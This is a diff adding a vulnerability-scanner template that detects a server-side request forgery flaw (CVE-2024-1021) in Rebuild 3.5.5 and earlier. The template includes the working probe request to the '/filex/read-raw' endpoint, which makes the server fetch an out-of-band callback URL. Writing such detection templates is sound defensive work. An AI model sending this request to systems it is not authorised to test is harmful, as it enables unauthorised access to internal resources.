Add CVE-2024-1021

http/cves/2024/CVE-2024-1021.yaml

@@ -0,0 +1,36 @@
+id: CVE-2024-1021
+
+info:
+  name: Rebuild <= 3.5.5 - Server-Side Request Forgery
+  author: BMCel
+  severity: medium
+  description: |
+    There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
+  remediation: |
+    Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-1021
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1021
+    - https://github.com/getrebuild/rebuild
+  metadata:
+    max-request: 1
+  tags: cve2024,cve,rebuild,ssrf
+
+http:
+  - raw:
+      - |
+        GET /filex/read-raw?url=http://{{interactsh-url}}&cut=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200